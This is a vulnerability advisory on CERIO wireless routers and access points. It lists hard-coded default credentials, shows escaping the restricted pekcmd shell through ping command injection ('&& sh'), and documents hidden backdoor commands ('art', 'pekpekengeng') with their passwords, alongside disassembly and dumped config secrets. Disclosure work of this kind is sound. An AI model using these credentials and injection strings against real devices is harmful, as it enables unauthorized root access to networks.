CERIO 11nbg 2.4Ghz High Power Wireless Router (pekcmd) Rootshell Backdoors
Vendor: CERIO Corporation
Product web page: http://www.cerio.com.tw
Affected version: DT-100G-N (fw: Cen-WR-G2H5 v1.0.6)
DT-300N (fw: Cen-CPE-N2H10A v1.0.14)
DT-300N (fw: Cen-CPE-N2H10A v1.1.6)
CW-300N (fw: Cen-CPE-N2H10A v1.0.22)
Kozumi? (fw: Cen-CPE-N5H5R v1.1.1)
Summary: CERIO's DT-300N A4 eXtreme Power 11n 2.4Ghz 2x2
High Power Wireless Access Point with built-in 10dBi
patch antennas and also supports broadband wireless
routing. DT-300N A4's wireless High Power design
enhances the range and stability of the device's
wireless signal in office and home environments.
Another key hardware function of DT-300N A4 is its PoE
Bridging feature, which allows subsequent devices to
be powered through DT-300N A4's LAN port. This
reduces device cabling and allows for more convenient
deployment. DT-300N A4 utilizes a 533Mhz high power CPU base
with 11n 2x2 transmission rates of 300Mbps. This
powerful device can produce high level performance
across multiple rooms or large spaces such as offices,
schools, businesses and residential areas. DT-300N A4
is suitable for both indoor and outdoor deployment,
and utilizes an IPX6 weatherproof housing.
The DT-300N A4 hardware equipped with to bundles
Cerio CenOS 5.0 Software Core. CenOS 5.0 devices can
use integrated management functions of Control
Access Point (CAP Mode) to manage an AP network.
Desc: Cerio Wireless Access Point and Router suffers from
several vulnerabilities including: hard-coded and default
credentials, information disclosure, command injection and
hidden backdoors that allows escaping the restricted shell
into a root shell via the 'pekcmd' binary. Given that all
the processes run as root, an attacker can easily drop into
the root shell with supplying hard-coded strings stored in
.rodata segment assigned as static constant variables. The
pekcmd shell has several hidden functionalities for enabling
an advanced menu and modifying MAC settings as well as easily
escapable regex function for shell characters.
Tested on: Cenwell Linux 802.11bgn MIMO Wireless AP(AR9341)
RALINK(R) Cen-CPE-N5H2 (Access Point)
CenOS 5.0/4.0/3.0
Hydra/0.1.8
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5409
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5409.php
16.05.2017
---
Large number of devices uses the cenwell firmware (mips arch)
which comes with few surprises.
Default credentials (web interface):
------------------------------------
operator:1234
admin:admin
root:default
Default credentials (linux shell, ssh or telnet):
-------------------------------------------------
root:default
ate:default
Contents of /etc/passwd (DES):
------------------------------
root:deGewFOVmIs8E:0:0:root:/:/bin/pekcmd <---
The /bin/pekcmd binary is a restricted shell environment with
limited and customized set of commands that you can use for
administering the device once you've logged-in with the root:default
credentials.
➜~ telnet 10.0.0.17
Trying 10.0.0.17...
Connected to 10.0.0.17.
Escape character is '^]'.
Login: root
Password: *******
command>
command> help
Avaliable commands:
infoShow system informations
pingPing!
clear clear screen
default Set default and reboot
passwdChange root password
rebootReboot
ifconfigIP Configuration
iwconfigConfigure a WLAN interface
iwprivConfigure private parameters of a WLAN interface
exitExit
helpshow this help
command> id
id: no such command
command>
Analyzing the pekcmd binary revealed the hidden backdoors and the
hidden advanced menu. Here is the invalid characters check function:
-------------------------------------------------------------------------
.text:00401F60 check_shellchars:
.text:00401F60 li$gp, 0x1FB00
.text:00401F68 addu$gp, $t9
.text:00401F6C addiu $sp, -0x38
.text:00401F70 sw$ra, 0x38+var_4($sp)
.text:00401F74 sw$s2, 0x38+var_8($sp)
.text:00401F78 sw$s1, 0x38+var_C($sp)
.text:00401F7C sw$s0, 0x38+var_10($sp)
.text:00401F80 sw$gp, 0x38+var_28($sp)
.text:00401F84 la$a1, 0x410000
.text:00401F88 la$t9, memcpy
.text:00401F8C addiu $s0, $sp, 0x38+var_20
.text:00401F90 move$s2, $a0
.text:00401F94 addiu $a1, (asc_409800 - 0x410000)# ";><|$~*{}()"
.text:00401F98 move$a0, $s0 # dest
.text:00401F9C jalr$t9 ; memcpy
.text:00401FA0 li$a2, 0xB # n
.text:00401FA4 lw$gp, 0x38+var_28($sp)
.text:00401FA8 b loc_401FE4
.text:00401FAC addiu $s1, $sp, 0x38+var_15
.text:00401FB0 lb$a1, 0($s0)# c
.text:00401FB4 jalr$t9 ; strchr
.text:00401FB8 addiu $s0, 1
.text:00401FBC lw$gp, 0x38+var_28($sp)
.text:00401FC0 beqz$v0, loc_401FE4
.text:00401FC4 move$a1, $v0
.text:00401FC8 la$a0, 0x410000
.text:00401FCC la$t9, printf
.text:00401FD0 nop
.text:00401FD4 jalr$t9 ; printf
.text:00401FD8 addiu $a0, (aIllegalArgumen - 0x410000)# "illegal argument: %s\n"
.text:00401FDC b loc_402000
.text:00401FE0 nop
.text:00401FE4 la$t9, strchr
.text:00401FE8 bne $s0, $s1, loc_401FB0
.text:00401FEC move$a0, $s2 # command
.text:00401FF0 la$t9, system
.text:00401FF4 nop
.text:00401FF8 jalr$t9 ; system
.text:00401FFC nop
.text:00402000 lw$ra, 0x38+var_4($sp)
.text:00402004 lw$gp, 0x38+var_28($sp)
.text:00402008 move$v0, $zero
.text:0040200C lw$s2, 0x38+var_8($sp)
.text:00402010 lw$s1, 0x38+var_C($sp)
.text:00402014 lw$s0, 0x38+var_10($sp)
.text:00402018 jr$ra
.text:0040201C addiu $sp, 0x38
.text:0040201C# End of function check_shellchars
-------------------------------------------------------------------------
command> ping 127.0.0.1 -c 1 | id
illegal argument: | id
command>
Escaping the restricted shell using Ping command injection:
command> ping 127.0.0.1 -c1 && id
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.3 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.3/0.3/0.3 ms
uid=0(root) gid=0(root)
We can easily drop into a sh:
command> ping 127.0.0.1 -c1 && sh
PING 127.0.0.1 (127.0.0.1): 56 data bytes
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.3 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 packets received, 0% packet loss
round-trip min/avg/max = 0.3/0.3/0.3 ms
BusyBox v1.11.2 (2014-07-29 12:05:26 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
~ # ls
bindevetc_ro libmountpekcmd resetsystmpetc tmpvar var
cfgetchome mntpekproc sbin tmptmphomeusr
~ # cat /etc/passwd
root:deGewFOVmIs8E:0:0:root:/:/bin/pekcmd
~ # uname -a
Linux (none) 2.6.31--LSDK-9.2.0_U9.915 #9 Mon Aug 11 09:48:52 CST 2014 mips unknown
~ # cd etc
/etc # cat hostapd0.conf
interface=ath0
ssid={{SSID_OMITTED}}
macaddr_acl=0
logger_syslog=-1
logger_syslog_level=2
logger_stdout=-1
logger_stdout_level=2
dump_file=/tmp/hostapd0.dump
ctrl_interface=/var/run/hostapd
ctrl_interface_group=0
rts_threshold=2346
fragm_threshold=2346
max_num_sta=32
wpa_group_rekey=600
wpa_gmk_rekey=86400
wpa_pairwise=TKIP
wpa=2
wpa_passphrase=0919067031
/etc # cat version
Atheros/ Version 1.0.1 with AR7xxx --三 2月 5 17:30:42 CST 2014
/etc # cd /home/httpd/cgi-bin
/home/httpd/cgi-bin # cat .htpasswd
root:deGewFOVmIs8E
/home/httpd/cgi/bin # cd /cfg
/cfg # ls -al
drwxr-xr-x2 root root0 Jan1 00:00 .
drwxr-xr-x 23 1000 1000305 Feb52014 ..
-rw-r--r--1 root root 7130 Jan1 00:00 config
-rwxrwxrwx1 root root427 Jan1 00:00 rsa_host_key
-rwxrwxrwx1 root root225 Jan1 00:00 rsa_host_key.pub
-rw-r--r--1 root root 22 Jan1 00:00 telnet.conf
/cfg # cat telnet.conf
Root_password=default
/cfg # cat config |grep pass
Root_password "default"
Admin_password "admin"
/cfg # exit
command>
The hidden 'art' command backdoor enabling root shell, calling system sh
using password: 111222333:
-------------------------------------------------------------------------
la$a0, 0x410000
la$t9, strcmp
addiu $a1, $sp, 0xB8+var_A0# s2
jalr$t9 ; strcmp
addiu $a0, (a111222333 - 0x410000)# "111222333"
lw$gp, 0xB8+var_A8($sp)
sltu$s0, $zero, $v0
.text:004035D8 loc_4035D8:
.text:004035D8 la$a1, 0x410000
.text:004035DC la$t9, strcpy
.text:004035E0 addiu $s0, $sp, 0xB8+var_8C
.text:004035E4 addiu $a1, (aArt - 0x410000)# "ART"
.text:004035E8 move$a0, $s0 # dest
.text:004035EC sw$zero, 0xB8+var_8C($sp)
.text:004035F0 sw$zero, 4($s0)
.text:004035F4 sw$zero, 8($s0)
.text:004035F8 sw$zero, 0xC($s0)
.text:004035FC jalr$t9 ; strcpy
.text:00403600 sw$zero, 0x10($s0)
.text:00403604 lw$gp, 0xB8+var_A8($sp)
.text:00403608 nop
.text:0040360C la$t9, strlen
.text:00403610 nop
.text:00403614 jalr$t9 ; strlen
.text:00403618 move$a0, $s0 # s
.text:0040361C lw$gp, 0xB8+var_A8($sp)
.text:00403620 move$a3, $zero # flags
.text:00403624 addiu $a2, $v0, 1# n
.text:00403628 la$t9, send
.text:0040362C move$a0, $s1 # fd
.text:00403630 jalr$t9 ; send
.text:00403634 move$a1, $s0 # buf
.text:00403638 lw$gp, 0xB8+var_A8($sp)
.text:0040363C move$a1, $s0 # buf
.text:00403640 li$a2, 0x14# nbytes
.text:00403644 la$t9, read
.text:00403648 nop
.text:0040364C jalr$t9 ; read
.text:00403650 move$a0, $s1 # fd
.text:00403654 lw$gp, 0xB8+var_A8($sp)
.text:00403658 nop
.text:0040365C la$t9, close
.text:00403660 nop
.text:00403664 jalr$t9 ; close
.text:00403668 move$a0, $s1 # fd
.text:0040366C lw$gp, 0xB8+var_A8($sp)
.text:00403670 nop
.text:00403674 la$a0, 0x410000
.text:00403678 la$t9, puts
.text:0040367C nop
.text:00403680 jalr$t9 ; puts
.text:00403684 addiu $a0, (aEnterArtMode - 0x410000)# "\n\n===>Enter ART Mode"
.text:00403688 lw$gp, 0xB8+var_A8($sp)
.text:0040368C nop
.text:00403690 la$v0, stdout
.text:00403694 la$t9, fflush
.text:00403698 lw$a0, (stdout - 0x41A000)($v0)# stream
.text:0040369C jalr$t9 ; fflush
.text:004036A0 nop
.text:004036A4 lw$gp, 0xB8+var_A8($sp)
.text:004036A8 nop
.text:004036AC la$a0, 0x410000
.text:004036B0 la$t9, system
.text:004036B4 addiu $a0, (aSh - 0x410000)# "sh"
-------------------------------------------------------------------------
command> art
Enter password
===>Enter ART Mode
BusyBox v1.11.2 (2014-07-28 12:48:51 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
The hidden 'pekpekengeng' backdoor enabling advanced commands
and access to root shell:
-------------------------------------------------------------------------
la$v0, 0x420000
nop
lw$s0, (off_419A48 - 0x420000)($v0) # off_419A48 = "pekpekengeng"
jalr$t9 ; strlen
move$a0, $s0 # s
lw$gp, 0x38+var_28($sp)
bne $s3, $v0, loc_403350
move$a0, $s5 # s1
la$t9, strncmp
move$a1, $s0 # s2
jalr$t9 ; strncmp
move$a2, $s3 # n
lw$gp, 0x38+var_28($sp)
bnez$v0, loc_403350
li$v1, 1
loc_4033A8:
la$t9, printf
addiu $a0, $s1, (aSNoSuchCommand - 0x410000)# "%s: no such command\n"
jalr$t9 ; printf
move$a1, $s4
la$a0, 0x410000
la$t9, puts
nop
jalr$t9 ; puts
addiu $a0, (aAdvancedComman - 0x410000)# "\nAdvanced commands:"
lw$gp, 0x28+var_18($sp)
nop
la$v0, 0x420000
nop
addiu $s0, $v0, (off_4199A8 - 0x420000)
la$v0, 0x410000
b loc_4020F8
addiu $s1, $v0, (a16sS - 0x410000)# "%-16s%s\n"
-------------------------------------------------------------------------
command> help
Avaliable commands:
infoShow system informations
pingPing!
clear clear screen
default Set default and reboot
passwdChange root password
rebootReboot
ifconfigIP Configuration
iwconfigConfigure a WLAN interface
iwprivConfigure private parameters of a WLAN interface
exitExit
helpshow this help
command> sh
sh: no such command
command> pekpekengeng
pekpekengeng: no such command
command> help
Avaliable commands:
infoShow system informations
pingPing!
clear clear screen
default Set default and reboot
passwdChange root password
rebootReboot
ifconfigIP Configuration
iwconfigConfigure a WLAN interface
iwprivConfigure private parameters of a WLAN interface
exitExit
helpshow this help
Advanced commands:
ifconfigIP Configuration
shroot shell
quitQuit
command> sh
BusyBox v1.11.2 (2013-02-22 10:51:58 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.
~ # id
uid=0(root) gid=0(root)
~ #
Other hidden functionalities:
command> unistorm
Usage:
unistorm device mac count [interval] [len]
command>
command> unistorm 1 2 3
target: 02:7f875b7c:2ab4a770:4007c4:2aac5010:00
ioctl SIOCGIFINDEX: No such devicecommand>
Serial connection password: 123456789
Hidden 'ate' mode:
.text:00401BB0
.text:00401BB0 loc_401BB0:# CODE XREF: main+284j
.text:00401BB0 la$t9, lineedit_read_key
.text:00401BB4 nop
.text:00401BB8 jalr$t9 ; lineedit_read_key
.text:00401BBC move$a0, $s0
.text:00401BC0 lw$gp, 0xC8+var_B8($sp)
.text:00401BC4 nop
.text:00401BC8 la$t9, lineedit_handle_byte
.text:00401BCC nop
.text:00401BD0 jalr$t9 ; lineedit_handle_byte
.text:00401BD4 move$a0, $v0
.text:00401BD8 lw$gp, 0xC8+var_B8($sp)
.text:00401BDC
.text:00401BDC loc_401BDC:# CODE XREF: main+244j
.text:00401BDC lw$v1, -0x634C($s1)
.text:00401BE0 nop
.text:00401BE4 slti$v0, $v1, 3
.text:00401BE8 bnez$v0, loc_401BB0
.text:00401BEC li$v0, 3
.text:00401BF0 beq $v1, $v0, loc_401D48
.text:00401BF4 nop
.text:00401BF8 la$v0, 0x420000
.text:00401BFC nop
.text:00401C00 lw$v1, (dword_419CB8 - 0x420000)($v0)
.text:00401C04 li$v0, 1
.text:00401C08 bne $v1, $v0, loc_401C98
.text:00401C0C move$a1, $zero
.text:00401C10 la$a0, 0x410000
.text:00401C14 la$t9, puts
.text:00401C18 nop
.text:00401C1C jalr$t9 ; puts
.text:00401C20 addiu $a0, (aAteMode - 0x410000)# "ate mode"
.text:00401C24 lw$gp, 0xC8+var_B8($sp)
.text:00401C28 nop
.text:00401C2C la$v0, stdout
.text:00401C30 la$t9, fflush
.text:00401C34 lw$a0, (stdout - 0x41A000)($v0)# stream
.text:00401C38 jalr$t9 ; fflush
.text:00401C3C nop
.text:00401C40 lw$gp, 0xC8+var_B8($sp)
.text:00401C44 nop
.text:00401C48 la$t9, lineedit_back_term
.text:00401C4C nop
.text:00401C50 jalr$t9 ; lineedit_back_term
.text:00401C54 nop
.text:00401C58 lw$gp, 0xC8+var_B8($sp)
.text:00401C5C nop
.text:00401C60 la$a0, 0x410000
.text:00401C64 la$t9, system
.text:00401C68 nop
.text:00401C6C jalr$t9 ; system
.text:00401C70 addiu $a0, (aSh - 0x410000)# "sh"
.text:00401C74 lw$gp, 0xC8+var_B8($sp)
.text:00401C78 nop
.text:00401C7C la$t9, lineedit_set_term
.text:00401C80 nop
.text:00401C84 jalr$t9 ; lineedit_set_term
.text:00401C88 nop
.text:00401C8C lw$gp, 0xC8+var_B8($sp)
.text:00401C90 b loc_401D48
.text:00401C94 nop
Web server configuration information disclosure:
http://TARGET/hydra.conf